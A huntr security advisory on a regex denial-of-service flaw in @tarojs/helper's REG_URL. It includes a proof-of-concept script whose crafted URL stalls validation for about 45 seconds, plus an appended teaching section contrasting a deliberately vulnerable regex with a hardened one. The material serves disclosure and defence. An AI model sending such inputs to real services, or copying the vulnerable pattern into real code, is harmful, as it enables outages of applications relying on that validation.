huntr advisory 0EBE85E6-CC85-42B8-957E-18D8DF277414

Inefficient Regular Expression Complexity in nervjs/taro

2021-09-02 14:01:44
ready-research
www.huntr.dev

EPSS score: 0.001 (Low), percentile 45.8%

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the REG_URL regular expression exported by the @tarojs/helper package. An attacker able to supply a crafted string as the URL that is tested against REG_URL can make the application consume an excessive amount of CPU on a single validation call.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs (an ES module, so the .mjs extension matters):

// poc.mjs
// Imports the CommonJS package as a default export and times a single
// REG_URL.test() call against a host made of many short numeric labels
// followed by a trailing dot, which forces the match to fail only at the end.
import pkg from '@tarojs/helper';
const { REG_URL } = pkg;

const input = 'http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.';
const start = Date.now();
REG_URL.test(input);
const timeCost = Date.now() - start;
console.log('Time taken to validate : ' + timeCost + ' ms');

Install the package and run the script from the same directory:

npm i @tarojs/helper
node poc.mjs

Check the output:

Time taken to validate : 44880 ms

💥 Impact

This vulnerability lets an attacker exhaust CPU and, because a Node.js process runs the regex on its single event-loop thread, block every other request for the duration of the match. URL validation should take on the order of a millisecond; in the case above a single input of under 100 characters takes about 45 seconds, and an attacker can submit such inputs repeatedly to keep the process busy indefinitely.
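To make the mechanism concrete, here is an added example that is not code from the advisory or from the taro project. It uses a simplified, assumed stand-in for a URL regex with the same nested-quantifier structure in the hostname labels (REG_URL's real pattern is not reproduced), builds the same kind of crafted input, counts the parses a backtracking engine has to try before giving up, times the vulnerable pattern against an unambiguous rewrite, and puts a length cap in front of the regex. The two regexes, the 2048-character cap and all function names are assumptions for illustration.

```javascript
// Added example, not code from the advisory or from the taro project. The two
// regexes are ASSUMED simplified stand-ins that share the weakness class of the
// reported REG_URL; they are not @tarojs/helper's actual pattern.
const now = () => (typeof performance !== 'undefined' ? performance.now() : Date.now());

// Hypothetical vulnerable pattern. Inside a hostname label,
// `(?:[a-z0-9]-*)*[a-z0-9]+` can hand a run of alphanumerics to the starred
// group or to the `+` in several ways, and the choice is made per label, so a
// failure at the end (the TLD) forces the engine to revisit every combination.
const VULNERABLE_REG_URL =
  /^https?:\/\/(?:(?:[a-z0-9]-*)*[a-z0-9]+)(?:\.(?:[a-z0-9]-*)*[a-z0-9]+)*\.[a-z]{2,}\.?(?::\d{2,5})?(?:[\/?#]\S*)?$/i;

// Hardened rewrite of the same grammar: a label is one alphanumeric followed
// by zero or more (dashes, then one alphanumeric). Each character has exactly
// one way to be consumed, so the same failure costs linear backtracking.
const HARDENED_REG_URL =
  /^https?:\/\/[a-z0-9](?:-*[a-z0-9])*(?:\.[a-z0-9](?:-*[a-z0-9])*)*\.[a-z]{2,}\.?(?::\d{2,5})?(?:[\/?#]\S*)?$/i;

// Same shape as the advisory's input: n numeric labels ending in a bare dot,
// so the TLD alternative fails only after every label has been consumed.
function craftedUrl(n) {
  return 'http://foobar.' + '00.'.repeat(n);
}

// Number of ways the vulnerable label grammar can consume each label, multiplied
// across labels: the size of the search space the engine walks on failure.
// Assumes a host made only of [a-z0-9.-] (all inputs here are constructed).
function parseWays(host) {
  const isAlnum = (c) => /[a-z0-9]/i.test(c);
  let total = 1;
  for (const label of host.split('.')) {
    let ways = 0;
    for (let k = 0; k < label.length; k++) {
      const prefix = label.slice(0, k); // taken by (?:[a-z0-9]-*)*
      const suffix = label.slice(k);    // taken by [a-z0-9]+
      const prefixOk = prefix === '' || isAlnum(prefix[0]);
      const suffixOk = !suffix.includes('-');
      if (prefixOk && suffixOk) ways++;
    }
    total *= ways;
  }
  return total;
}

// Times one regex test; returns { matched, ms }.
function probe(re, input) {
  const t0 = now();
  const matched = re.test(input);
  return { matched, ms: now() - t0 };
}

// What a validator should look like: reject oversized input before any regex
// runs (assumed cap), then use the unambiguous pattern.
const MAX_URL_LENGTH = 2048;
function isUrl(input) {
  if (typeof input !== 'string' || input.length > MAX_URL_LENGTH) return false;
  return HARDENED_REG_URL.test(input);
}

// Demo: every four extra labels multiplies the vulnerable regex's work by about
// 16 while the hardened one stays flat. Kept to n <= 16 so it finishes quickly.
function demo() {
  const rows = [];
  for (const n of [8, 12, 16]) {
    const url = craftedUrl(n);
    const host = url.slice('http://'.length, -1); // drop scheme and trailing dot
    const v = probe(VULNERABLE_REG_URL, url);
    const h = probe(HARDENED_REG_URL, url);
    rows.push({ n, ways: parseWays(host), vulnerableMs: v.ms, hardenedMs: h.ms });
  }
  return rows;
}

for (const r of demo()) {
  console.log(`n=${r.n} labels, ${r.ways} parses: vulnerable ${r.vulnerableMs.toFixed(2)} ms, hardened ${r.hardenedMs.toFixed(3)} ms`);
}
```

Run it with node and compare the two timing columns as n grows; the parse count is what the backtracking engine has to exhaust before it can report "no match". The fix is structural, not a faster engine: remove every position where two sub-patterns can both consume the same character, and cap input length so that even a remaining superlinear path has a bounded worst case.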

